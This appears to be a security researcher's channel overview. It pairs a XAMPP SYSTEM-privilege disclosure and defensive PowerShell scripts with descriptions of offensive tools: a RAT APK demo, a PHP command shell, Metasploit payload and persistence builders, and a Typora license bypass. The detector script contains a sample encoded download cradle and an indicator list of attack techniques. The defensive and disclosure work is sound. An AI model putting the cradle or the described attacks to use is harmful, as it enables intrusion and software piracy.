ZeroVector Cyber Defense Overview

🚨 CRITICAL SECURITY DISCLOSURE: XAMPP Apache Service Privilege Escalation (Windows) 🚨

A serious misconfiguration in default XAMPP installations on Windows has been identified - and it’s not a minor oversight. This is a privilege escalation risk with real-world impact potential.

🔍 What’s the Issue?

Security researcher Johnny Watts has uncovered a flaw in how the Apache service is configured by default in XAMPP on Windows systems.

👉 By default, Apache runs under the LocalSystem account (NT AUTHORITY\SYSTEM)
👉 This is one of the highest privilege levels available on a Windows machine

This means a web-facing service is operating with maximum system level permissions - a fundamentally dangerous design choice.

⚠️ Why This Matters:

Running Apache as SYSTEM dramatically expands the blast radius of any compromise.

Because the worker process itself is SYSTEM, any code execution an attacker gets through the web application (a file upload, a command injection, a web shell) already runs at that level, so they could:

💥 Access sensitive files, configs, and databases
💥 Execute arbitrary code with SYSTEM-level privileges
💥 Fully compromise the host machine
💥 Pivot deeper into the network for lateral movement

This is not theoretical - it's a classic privilege escalation pathway created by poor defaults.

🧠 Security Breakdown
Attack Surface: Web-facing Apache service
Privilege Context: SYSTEM (highest level)
Risk Type: Privilege Escalation to Full System Compromise
Root Cause: Insecure default "Log On As" configuration

🧪 Proof of Concept (PoC)
A controlled and ethical PoC has been developed to demonstrate the real impact of this misconfiguration.

✔️ Shows how existing vulnerabilities can be chained
✔️ Demonstrates execution within SYSTEM context
✔️ Highlights how quickly systems can be fully compromised

🛡️ Recommended Mitigation

Do NOT run Apache as SYSTEM. Immediate action should include:

✅ Reconfigure the Apache service to run under a dedicated low-privileged local account (it needs the "Log on as a service" right and write access only to the directories Apache and PHP actually write to, such as the log and temp directories)
✅ Apply the principle of least privilege: the account must not be a member of Administrators and should own nothing outside the web root, logs, and temp directories
✅ Audit the "Log On As" account of every service across environments, not only the XAMPP hosts
✅ Harden XAMPP deployments before exposing them to any network
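The steps above as a worked example, added here and not taken from the disclosure repository or from XAMPP itself. It audits which services run as SYSTEM from a non-Windows path, creates a dedicated local account, grants it only the filesystem rights httpd and PHP need, and re-points the service's "Log On As" through the Service Control Manager. Assumptions: XAMPP lives in C:\xampp, the Apache service is registered under XAMPP's default name Apache2.4, and the account name svc-apache is a choice made for this example.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the disclosure repo or from XAMPP. Assumptions:
# XAMPP is installed under C:\xampp, the Apache service is registered under
# XAMPP's default name 'Apache2.4', and 'svc-apache' is the account name chosen here.
$ServiceName = 'Apache2.4'
$XamppRoot   = 'C:\xampp'
$SvcUser     = 'svc-apache'

function Get-ServiceLogon {
    # Shows the "Log On As" identity: on a stock XAMPP install this reads 'LocalSystem'.
    param([string]$Name)
    Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'" |
        Select-Object Name, State, StartName, PathName
}

function Get-SystemServicesOutsideWindows {
    # Audit helper: services that run as SYSTEM but whose binary lives outside
    # %SystemRoot%. Third-party daemons such as XAMPP's httpd.exe show up here.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.StartName -eq 'LocalSystem' -and
            $_.PathName -and
            $_.PathName.TrimStart('"') -notlike "$env:SystemRoot\*"
        } |
        Select-Object Name, State, StartName, PathName
}

function Set-ServiceAccountLeastPrivilege {
    param(
        [string]$Name,
        [string]$User,
        [System.Security.SecureString]$Password
    )

    # Dedicated local account: not in Administrators, never used interactively.
    if (-not (Get-LocalUser -Name $User -ErrorAction SilentlyContinue)) {
        New-LocalUser -Name $User -Password $Password -PasswordNeverExpires `
            -UserMayNotChangePassword -Description 'XAMPP Apache service account' | Out-Null
    }

    # Filesystem least privilege: read/execute on the install and web root,
    # modify only where httpd and PHP actually write (logs, session/temp files).
    # Add htdocs subfolders to the modify list only if the app handles uploads.
    foreach ($dir in 'apache', 'php', 'htdocs') {
        icacls "$XamppRoot\$dir" /grant "${User}:(OI)(CI)RX" /T | Out-Null
    }
    foreach ($dir in 'apache\logs', 'tmp') {
        icacls "$XamppRoot\$dir" /grant "${User}:(OI)(CI)M" /T | Out-Null
    }

    # Re-point "Log On As" through the SCM (Win32_Service.Change). The account
    # must also hold the "Log on as a service" right (SeServiceLogonRight);
    # assign it under Local Security Policy > User Rights Assignment if the
    # service then fails to start with logon failure 1069.
    $plain = [System.Net.NetworkCredential]::new('', $Password).Password
    $svc   = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    $res   = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{
        StartName     = ".\$User"
        StartPassword = $plain
    }
    if ($res.ReturnValue -ne 0) {
        throw "Win32_Service.Change failed with return code $($res.ReturnValue)"
    }

    Restart-Service -Name $Name
    Get-ServiceLogon -Name $Name   # StartName should now read .\svc-apache
}

# Usage: inspect first, then audit the whole host, then fix the Apache service.
Get-ServiceLogon -Name $ServiceName
Get-SystemServicesOutsideWindows | Format-Table -AutoSize
$pw = Read-Host -Prompt "Password for $SvcUser" -AsSecureString
Set-ServiceAccountLeastPrivilege -Name $ServiceName -User $SvcUser -Password $pw
```

Windows does not reserve ports below 1024 for administrators, so httpd binds 80/443 from this account without any extra right. The change contains a web-application compromise to the service account's permissions; it does not fix the web vulnerabilities the PoC chains, which still need patching separately.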

📎 Full Disclosure & Fix

For full technical details, PoC breakdown, and remediation steps:
👉 https://github.com/kaotickj/Apache-Service-XAMPP-WindowsPrivEsc-Disclosure


📢 Final Take

Default configurations should never introduce critical security risk - yet here we are.

If you’re running XAMPP in any capacity (dev, staging, or worse - production), review this immediately. The cost of ignoring it is system-level compromise.

Full Red Team Exploit Chain: Joomla 3.3.0 SQLi to SYSTEM Shell | Custom Recon & Post-Ex Tools Demo

In this video, I demonstrate using a few of my red-team tools for recon and exploiting a vulnerable web application: Joomla 3.3.0 (SQL injection / session hijack).

NetSentinel network recon tool, which you can find at: https://github.com/kaotickj/NetSentinel

JoomHeist: https://github.com/kaotickj/JoomHeist

The Not So Simple PHP Command Shell: https://github.com/kaotickj/The-Not-So-Simple-PHP-Command-Shell

K-Sploit: https://github.com/kaotickj/K-Sploit

For the underlying vulnerability info, see: https://nvd.nist.gov/vuln/detail/CVE-2015-7297

For the privileged access flaw in all versions of XAMPP, see my report at: https://github.com/kaotickj/Apache-Service-XAMPP-WindowsPrivEsc-Disclosure

### Disclaimer: This video is for educational and demonstration purposes only. The target hosts featured in this video are intentionally vulnerable virtual machines running in my own isolated testing lab. Nothing in this video is intended for unlawful use cases.

Demonstration: The Not So Simple PHP Command Shell - Linux Target. (Numerous CRITICAL flaws found).

Important Disclaimer: This demonstration was performed in a controlled, isolated virtual lab on systems I own. Do not use techniques shown in this video against systems for which you do not have written authorization. The code and tools shown are intended for authorized security testing, education, and research only.

In this video I demonstrate the Linux-target version of my tool — The Not-So-Simple PHP Command Shell (linux-nsscmdshell.php) — against a deliberately vulnerable web application (“Online Learning Management System”) running in an isolated VM lab.

Typora License Validation Bypass (Public Disclosure – CVE Pending)

CVE Request 1891916 for CVE ID. This video demonstrates a security vulnerability in Typora's license enforcement logic. The issue was responsibly disclosed to the vendor with no corrective action taken. This video is part of a Coordinated Vulnerability Disclosure process. No illegal activity is demonstrated or encouraged.

Security Issue: Typora License Bypass via Client-Side JavaScript Tampering (Public Disclosure)

Affected Version: Typora for Windows x64, verified on `v1.10.8.0`. Earlier versions may also be affected.

Summary: Typora’s license validation mechanism is implemented entirely in client-side JavaScript. A trivial modification to a single line in `LicenseIndex.*.chunk.js` allows full and persistent bypass of the license enforcement logic, enabling unauthorized users to activate the application without a valid key.

⭐ How Hackers Hijack Phones: Real Remote Access Trojan (RAT) Demonstration Explained

This video demonstrates how malicious actors can remotely access and control a mobile device using a Trojanized APK — a Remote Access Trojan (RAT) generated with msfvenom and controlled through Metasploit Meterpreter. The purpose of this demonstration is to raise awareness about how easily an unsuspecting user can be compromised if they install untrusted apps, enable unknown sources, or bypass security warnings.

🔍 In this video you’ll see how attackers can:

  • Access contacts, SMS messages, and call logs

  • Use microphone and camera features remotely

  • Attempt privilege escalation (su/root)

  • Stream video from the device

  • Monitor device activity

  • Interact with the phone as if they physically possessed it

⚠️ Important: This is a controlled laboratory demonstration for cybersecurity education. Remote Access Trojans (RATs) are malicious by definition, and unauthorized access to any device is illegal. This video exists to help users, students, and professionals understand how these attacks happen - so they can better defend against them.

🛡️ How to protect yourself from these attacks:

  • Never install APKs from outside trusted stores

  • Do not bypass Android’s security warnings

  • Keep Play Protect and antivirus enabled

  • Review app permissions carefully

  • Avoid “modded apps,” pirated apps, or unknown utilities

  • Keep your device updated with the latest security patches

Demonstrating Usage of my Windows Registry Persistence Detector

🛡️ Windows Registry Persistence Detector in Action! 🛠️

This video demonstrates how to use my Windows Registry Persistence Detector to uncover malicious backdoor persistence hidden in the Windows registry. The tool scans for suspicious entries, including:
✅ PowerShell commands embedded in registry keys
✅ Base64-encoded or obfuscated payloads

Super useful for blue teamers, threat hunters, or curious sysadmins.
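To show what that kind of scan looks like in practice, here is an added example that is not the persistenceDetector tool's own code: it walks the Run, RunOnce and Winlogon keys, decodes any -EncodedCommand blob (PowerShell encodes these as UTF-16LE before base64) so the analyst sees the real command, and scores each value against a small list of living-off-the-land indicators. The key list and indicator patterns are choices made for this example, and the sample value it scores first is constructed, not taken from a real host.

```powershell
# Added example, not the persistenceDetector tool's own code.
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
)

# Indicators typical of living-off-the-land persistence; each hit is a reason, not a verdict.
$Indicators = [ordered]@{
    'powershell-hidden' = '(?i)-w(indowstyle)?\s+hidden'
    'no-profile'        = '(?i)-nop(rofile)?\b'
    'non-interactive'   = '(?i)-noni(nteractive)?\b'
    'bypass-policy'     = '(?i)-ep\s+bypass|-executionpolicy\s+bypass'
    'download-cradle'   = '(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b'
    'invoke-expression' = '(?i)\biex\b|invoke-expression'
    'inline-base64'     = '(?i)frombase64string'
    'script-host'       = '(?i)\b(mshta|wscript|cscript|regsvr32|rundll32)\b'
}

function Get-EncodedCommand {
    # Returns the decoded UTF-16LE payload behind -e/-ec/-enc/-EncodedCommand, or $null.
    param([string]$Command)
    $m = [regex]::Match($Command, '(?i)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }
    try {
        [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[2].Value))
    } catch { return $null }
}

function Test-RunValue {
    # Scores one autorun command line; returns $null when nothing looks off.
    param([string]$Key, [string]$Name, [string]$Command)
    $reasons = @()
    $decoded = Get-EncodedCommand -Command $Command
    if ($decoded) { $reasons += 'encoded-command' }
    # Match indicators against both the raw value and the decoded payload.
    $text = if ($decoded) { "$Command`n$decoded" } else { $Command }
    foreach ($k in $Indicators.Keys) {
        if ($text -match $Indicators[$k]) { $reasons += $k }
    }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{
        Key     = $Key
        Name    = $Name
        Command = $Command
        Decoded = $decoded
        Reasons = ($reasons -join ',')
    }
}

function Get-SuspiciousAutoruns {
    # Live scan: every string value under the autorun keys that exist on this host.
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = (Get-ItemProperty -Path $key).PSObject.Properties |
                 Where-Object { $_.Name -notlike 'PS*' -and $_.Value -is [string] }
        foreach ($p in $props) {
            $hit = Test-RunValue -Key $key -Name $p.Name -Command $p.Value
            if ($hit) { $hit }
        }
    }
}

# Constructed sample (not from a real host): an encoded download cradle, the kind
# of value the detector is meant to surface, run through the same scoring as live keys.
$cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
$b64    = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($cradle))
$sample = "powershell.exe -nop -w hidden -enc $b64"
Test-RunValue -Key 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' `
              -Name 'Updater' -Command $sample | Format-List

# Scan this host.
Get-SuspiciousAutoruns | Format-Table -AutoSize
```

The constructed sample is flagged with encoded-command, powershell-hidden, no-profile, download-cradle and invoke-expression, and the Decoded field shows the cradle in clear. Legitimate software does occasionally use -nop or -w hidden, so treat a single reason as a lead to verify (binary path, signer, install date) rather than a confirmed backdoor; the Winlogon Shell and Userinit values deserve a look even when they trip no indicator, since a modified path there is persistence with no PowerShell involved at all.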

🔗 Get the Tool:
Fork, clone, or download it here:
👉 https://github.com/kaotickj/persistenceDetector

💫 While you’re there, don’t forget to ⭐ star the repo and 👁️‍🗨️ watch it to stay updated!

Armitage Use

Demonstrating usage of Armitage to apply a GUI to msf tasks. In this demonstration, I use a known SQL injection vulnerability to compromise credentials and log in to the Learning Management System, then found a new vulnerability - arbitrary file upload - allowing me to further compromise the system and gain a reverse TCP shell.

💰 KSploit MSF Payload Tool Usage

Optimized for use in Kali Linux, KSploit is a user-friendly, menu-driven control panel from which to drive many Metasploit tasks. KSploit simplifies repetitive Metasploit functions such as generating payloads, deploying listeners, and injecting msf payloads into Windows executables. Requires the Metasploit Framework.

Get KSploit at https://github.com/kaotickj/K-Sploit

For complete documentation see https://github.com/kaotickj/K-Sploit/wiki

Exploits, payloads, listeners for:
🖥Windows 🐧 Linux 🍎 Mac 🤖 Android

👂 Listeners:
Use the listeners menu to craft and quickly deploy metasploit listeners. Choose from Windows x86/x64, Linux x86/x64, Mac/OSX, Bash, Meterpreter, and Netcat listeners.

💰 Payloads: Use the payloads menu to quickly and easily craft Metasploit payloads for a wide variety of targets. Payload options for Meterpreter, Windows x86/x64, Linux x86/x64, Mac/OSX, Android, and Python.

⌛ Persistence Scripts: Use the persistence scripts menu to craft persistence scripts for Windows x64 and Android.

💉 Windows Executable Payload Injection: Use the windows executable injection menu to inject metasploit payloads into windows executables.